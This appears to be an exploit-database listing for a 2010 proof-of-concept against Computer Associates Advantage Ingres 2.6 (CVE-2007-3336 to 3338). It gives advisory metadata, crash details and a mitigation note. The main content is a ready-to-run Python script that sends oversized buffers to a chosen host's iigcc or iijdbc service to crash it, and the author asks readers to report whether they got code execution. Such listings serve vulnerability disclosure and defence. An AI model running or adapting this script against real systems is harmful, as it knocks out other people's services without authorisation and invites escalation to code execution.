Computer Associates Advantage Ingres 2.6 Multiple Buffer Overflow Vulnerabilities PoC

vendor:

Advantage Ingres

by:

@fdiskyou

7,5

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: Advantage Ingres

Affected Version From: 2.6

Affected Version To: 2.6

Patch Exists: YES

Related CWE: CVE-2007-3336 - CVE-2007-3338

CPE: a:computer_associates:ingres:2.6

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows 2003 Server SP1

2010

Computer Associates Advantage Ingres 2.6 Multiple Buffer Overflow Vulnerabilities PoC

Computer Associates Advantage Ingres 2.6 is vulnerable to multiple buffer overflow vulnerabilities. The iigcc service is vulnerable to a buffer overflow vulnerability when a large amount of data is sent to the service. This causes a pointer to be overwritten at byte 2106 and it crashes while executing MOV EAX,DWORD PTR DS:[EDX+8]. The iijdbc service is vulnerable to a buffer overflow vulnerability when a large amount of data is sent to the service. This causes a pointer to be overwritten at byte 1066 and it crashes while executing CMP ECX,DWORD PTR DS:[EDI+4].

Mitigation:

Upgrade to the latest version of Computer Associates Advantage Ingres 2.6.

Source

Exploit-DB raw data:

# Exploit Title: Computer Associates Advantage Ingres 2.6 Multiple Buffer Overflow Vulnerabilities PoC
# Date: 2010-08-14
# Author: @fdiskyou
# e-mail: rui at deniable.org
# Version: 2.6
# Tested on: Windows 2003 Server SP1 en
# CVE: CVE-2007-3336 - CVE-2007-3338
# Notes: Fixed in the last version.
# iigcc - EDX holds a pointer that's overwritten at byte 2106 and it crashes while executing
# MOV EAX,DWORD PTR DS:[EDX+8]
# iijdbc - EDI holds a pointer that's overwritten at byte 1066 and it crashes while executing 
# CMP ECX,DWORD PTR DS:[EDI+4]
# please let me know if you are/were able to get code execution

import socket
import sys

if len(sys.argv) != 4:
    print "Usage: ./CAAdvantageDoS.py <Target IP> <Port> <Service>"
    print "Vulnerable Services: iigcc, iijdbc"
    sys.exit(1)

host = sys.argv[1]
port = int(sys.argv[2])
service = sys.argv[3]

if service == "iigcc":
        payload = "\x41" * 2106
elif service == "iijdbc":
        payload = "\x41" * 1066
else:
        print "Vulnerable Services: iigcc, iijdbc"
        sys.exit(1)

payload += "\x42" * 4

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
print "Sending payload"
s.send(payload)
data = s.recv(1024)
s.close()
print 'Received', repr(data)

print service + " crashed"